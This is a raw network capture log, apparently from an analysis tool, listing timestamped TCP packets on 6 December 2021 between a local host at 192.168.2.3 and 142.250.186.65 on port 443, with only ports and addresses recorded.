Dec 6, 2021 19:08:58.645358086 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.645401955 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.650600910 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.650602102 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.650645971 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.650674105 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.650713921 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.650751114 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.650790930 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.650830030 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.650866985 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.650906086 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.650944948 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.650980949 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.651012897 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.652462959 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.652564049 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.652602911 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.652641058 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.652678967 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.652718067 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.652756929 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.652802944 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.652842999 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.652915001 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.652952909 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.652990103 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653027058 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653064966 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653103113 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653141975 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653177023 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653214931 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653253078 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653289080 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653470993 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653511047 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653549910 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653587103 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653625011 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653662920 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653698921 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653738022 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653778076 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.653814077 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.654974937 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655026913 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655066967 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655107021 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655143976 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655183077 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655221939 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655260086 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655297995 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655335903 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655374050 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655412912 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655450106 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655488014 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655524969 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655563116 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655606985 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655643940 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655682087 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655719995 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655755043 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.655795097 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.656497955 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.656543970 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.656584978 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.656624079 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.656661034 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.656698942 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.656735897 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.656785965 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.656824112 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.656909943 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.656946898 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.656985044 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.657021999 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.657057047 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.657802105 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.657840967 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.657880068 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.657917976 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.657955885 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.657993078 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.658031940 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.658068895 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.658097029 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.658134937 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.658170938 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.658207893 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.658245087 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.658282042 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.658318996 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.658355951 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.659377098 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.659401894 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.659425020 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.659446955 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.659468889 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.659492016 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.659514904 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.659538984 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660407066 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660453081 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660475969 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660499096 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660521984 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660543919 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660567999 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660588980 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660610914 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660630941 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660651922 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660675049 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660696030 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.660717964 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662302017 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662332058 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662354946 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662384987 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662409067 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662431002 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662453890 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662477016 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662498951 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662522078 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662544966 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662566900 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662590027 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662611008 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662633896 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662656069 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662677050 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662700891 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662724018 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662746906 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662770033 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662792921 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662816048 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.662837982 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663606882 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663638115 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663661957 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663685083 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663707018 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663731098 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663753033 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663777113 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663800955 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663822889 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663846016 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663870096 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663891077 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663913965 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663934946 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663958073 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.663980961 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.664001942 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.664171934 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.664201975 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.664226055 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.664248943 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.664271116 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.664293051 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.664315939 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.664338112 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665384054 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665416956 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665441036 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665465117 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665488005 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665512085 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665533066 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665555954 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665577888 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665600061 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665621996 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665643930 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665666103 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665689945 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665709972 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.665731907 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.666968107 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.666996002 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.667017937 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.667042017 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.667064905 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.667087078 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.667109966 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.667130947 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.667152882 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.667175055 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.668147087 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.668406010 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.668721914 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.668941021 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.670104980 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.670131922 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.683357000 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.683568001 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.683784962 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.683994055 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.684694052 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.685414076 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.685627937 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.686115980 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.686386108 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.686592102 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.687066078 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.687203884 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687226057 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687241077 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687256098 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687273979 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687289953 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687305927 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687323093 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687339067 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687359095 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687375069 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687391043 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687407017 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687422991 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687438965 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687454939 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687469959 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687483072 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687498093 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687513113 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687663078 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687690020 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687705994 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687716961 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.687724113 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.687993050 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.688209057 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.688226938 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.688242912 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.688261032 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.688277960 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.688293934 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.688308954 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.688324928 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.690238953 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.690366983 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.690387964 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.690408945 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.690429926 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.690449953 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.690470934 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.690491915 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.690510035 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.690524101 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.690781116 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.691015959 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.691544056 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.691819906 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.692068100 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.702510118 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702543020 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702560902 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702579021 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702595949 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702613115 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702627897 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702646971 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702665091 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702725887 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702759981 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702778101 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702817917 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702835083 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702852964 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702869892 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702887058 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702903986 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702919960 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.702975988 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.703006983 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.703514099 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.703535080 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.703572989 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.703592062 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.703608990 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.703625917 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.703639984 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.703658104 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.703675032 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.703691959 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.703708887 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.703727007 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704675913 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704698086 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704703093 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.704715014 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704744101 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704763889 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704781055 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704797983 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704814911 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704832077 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704884052 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704901934 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704919100 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704936028 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704953909 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704972029 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.704988956 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.705007076 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.705025911 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.705041885 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.705060005 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.705218077 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.705245018 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.705430031 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.705462933 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.705480099 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.705497980 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.705811977 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.705993891 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706015110 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706041098 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.706051111 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706087112 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706104040 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706121922 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706139088 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706156969 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706495047 CET	53617	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:58.706639051 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706682920 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706713915 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706760883 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706778049 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706794024 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706811905 CET	443	53617	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:58.706829071 CET	443	53617	142.250.186.65	192.168.2.3
